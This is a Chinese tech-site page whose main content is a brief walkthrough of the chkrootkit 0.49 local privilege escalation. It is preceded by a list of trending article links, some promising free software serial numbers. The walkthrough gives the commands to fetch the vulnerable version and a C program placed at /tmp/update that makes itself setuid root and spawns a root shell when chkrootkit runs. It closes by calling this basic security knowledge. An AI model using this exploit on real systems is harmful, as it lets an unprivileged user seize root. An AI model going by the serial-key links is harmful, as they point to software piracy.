- 1PS提示:因为图层已锁定,无法编辑图层的处理方法
- 2picacg苹果版怎么找不到|picacg ios版是不是下架了介绍
- 3Adobe Illustrator CS5 序列号大全
- 4ACDsee注册码免费分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么换头像|Potato app更改头像方法介绍
- 6PDF浏览器能看3D文件吗?PDF浏览器看3D文件图文详细教程
- 7Potato(马铃薯聊天)怎么注册不了|Potato不能注册处理方法介绍
- 8最新的Adobe Illustrator CS4序列号大全
- 9Intel i7-9700K性能跑分曝光:同代提升约12%
- 10XP系统怎么清除缓存?
- 11Intel Z390主板有望10月8日公布:8核9代酷睿随后登场
- 12XP系统安装chrome无法找到入口怎么处理?
[摘要]Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:可以查看自己安装的是不是升到最新版了,或...
Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:
可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:
wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
tar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
cd chkrootkit-0.49/
./chkrootkit -V
普通用户在 /tmp 目录下新建 update.c(代码实示例如下):
#include <unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
然后编译好 update ,看下update的文件详情:
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记
执行有漏洞的 chkrootkit :
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记
再来看下 update 已经成功属于 root 组了!
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记
参考资料:
http://www.exploit-db.com/exploits/33899/
hackluom.net/chkrootkit-local-root/Vulnerability
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
推荐资讯 总人气榜
